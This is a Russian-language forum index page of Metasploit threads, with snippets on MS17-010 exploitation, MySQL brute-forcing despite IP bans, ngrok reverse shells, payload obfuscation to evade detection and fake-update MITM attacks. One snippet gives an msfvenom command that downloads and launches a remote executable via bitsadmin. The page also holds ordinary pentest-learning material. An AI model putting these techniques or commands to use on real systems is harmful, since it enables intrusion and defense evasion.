metasploit

Всем привет! Эксплуатирую уязвимость MS17-010 на Windows XP SP3 RU через метасплоит, модуль Command Execution, остальные завершаются с ошибкой. Создал нового пользователя, активировал на целевом хосте РДП, но не могу добавить пользователя в группу "Администраторы". Путём проб понял, что...

Всем добрейшего дня. Столкнулся с проблемкой,нашел сервер mysql,версия 5.5.6.2,после попыток Брута через модуль mysql_login после 100-150 попыток,на время банится айпиха. Пробовал вручную на кали включать прокси,но так же банится почему то моя айпиха,а не та которая через прокси. В данном модуле...

Привет. В последние время от всех друзей слышу, что Mac OS X - самая безопасная система. Но почему? Основной аргумент - у данной ОС закрытая файловая система, в то время как у Windows она открыта. Это значит, что можно просмотреть все системные файлы или отредактировать их. Злоумышленники...

Приветствую читателей yg140.servegame.com! Сегодня хотелось бы обратить внимание на один интересный проект, созданный для облегчения пользования Metasploit, а именно сеансами meterpreter и не только. И так, "Kage" - инструмент, представляющий собой графический интерфейс пользователя для "Metasploit...

Всем привет! Нужна помощь с разбором проблемы в комбинации metasploit с ngrok в kali linux. Сессия meterpreter не саздаёться, пробовал разные способы, искал решение в интернете но не нашёл. Можете написать как правильно создать ссесию meterpreter через openweb.

Здравствуйте, хотел бы узнать, как добавить exploit в metasploit. Пытался добавить через /root/.mfs4/modules/exploit/remote но не видит. Как например данный эксплотит добавить в metasploit ? На форуме ничего не нашел

Здравствуйте. Столкнулся впервые с такой проблемой sh: 0: getcwd() failed: No such file or directory sh: 0: getcwd() failed: No such file or directory [!] There was an error parsing `Gemfile`: No such file or directory - getcwd. Bundler cannot continue. # from...

upd 04.08.2021 - метод больше не работает тема закрыта Привет, сегодня я расскажу про установку Metasploit-Framework на твое Android-устройство. На сегодняшний день, Metasploit является одним из лучших инструментов пентеста. В нем собранно несколько тысяч эксплоитов и не только. С его помощью...

В предыдущей статье из серии профессиональных инструментов для аудита безопасности, мы загрузили и установили Metasploit. Теперь, мы начнем адаптироваться к Metasploit Framework и будем делать маленькие шаги чтобы инициировать наш первый настоящий взлом. Прежде чем мы начнем аудит безопасности...

Всем привет, я уже не первую неделю борюсь с проблемой обфускации смали кода reverse tcp и именно бесступенчатого реверса. В Evil-Droid есть вариант создания бесступенчатого реверса и его обфускации, но по каким то причинам это не работает (подозреваю что из за обновления метасплоита), так вот...

Привет, yg140.servegame.com! Эта статья посвящена теме, которая давно не дает мне покоя, — фейковым обновлениям ПО. Меня в целом захватывает мир атак типа Man-in-the-Middle (MITM), особенно их реализация внутри локальной сети. И подмена обновлений — один из самых коварных векторов. Года полтора назад я...

Всем доброго времени, при генерирование нагрузки в msfvenom , пэйлоадом windows/x64/exec с параметрами cmd="bitsadmin /transfer myjob /download /priority high https://mylink.com c:\myfile.exe&start myfile.exe" -f exe -o file.exe, при запуске на windows 10 x64, на доли секунды открывается окошко...

Открыть обратную шелл-сессию через NAT за 3 минуты — без единого проброшенного порта. Реально? Да! Берём Metasploit + Ngrok и показываем, как именно… Привет, yg140.servegame.com! В этом гайде покажу, как за пару минут поднять reverse shell на Windows (или любой другой ОС) через тандем Metasploit +...

Всем привет! Имею огромное желание найти друзей в сфере ИБ и пентеста. Я верю что нужно оружать себя правильными друзьями с такими же целями и мечтами как у тебя . Если ты с ДВ - отзовись :)

Приветствую всех форумчан! Есть вопрос по поводу метасплоита, а именно. Использую модуль auxiliary(scanner/http/crawler) Как только сайт на https - отказывается сканить. Все установки указываю как положено, порт и SSL. Http работает отлично. В чем может быть проблема?

Только не нужно советовать видеокурс Этичный хакинг, я про него итак знаю, да и там рассказывается обо всем. А я хочу посмотреть какой то курс чисто по эксплоитам, по работе с метасплоитом в линуксе и тд. Желательно с русским переводом. Книги тоже подойдут если годные

Первое, что нужно сделать. Если вы еще не скачали Metasploit, ознакомьтесь с этой инструкцией. А если Metasploit уже установлен на вашем компьютере, поздравляем! Вы можете начинать работу. О Metasploit Metasploit – это платформа для тестирования, поиска и использования уязвимостей. Она...

Совместная работа команды Поддержка мульти-пользователей предоставляет вам возможность сотрудничать с другими членами команды. Вы и ваша команда можете использовать один и тот же экземпляр Metasploit Pro для выполнения задач, просмотра данных, а также обмена проектами. Вы можете получить доступ...

Всем привет! Сегодня мы обновим и дополним классическое руководство по развертыванию одной из самых известных уязвимых машин для практики — Metasploitable3. Эта бесплатная виртуальная машина от создателей Metasploit, компании Rapid7, стала настоящим "must have" для всех, кто делает первые шаги в...

Друзья, подскажите, думаю многим пригодится В инете что не сервер, то новая инструкция, + разные оболочки с настойками Посоветуйте, как не напороть косяков! Грамотно установить оболочку, не инсталируя лишнего, что б не вызвать конфликтов. И главное как им (сервером) управлять в графическом...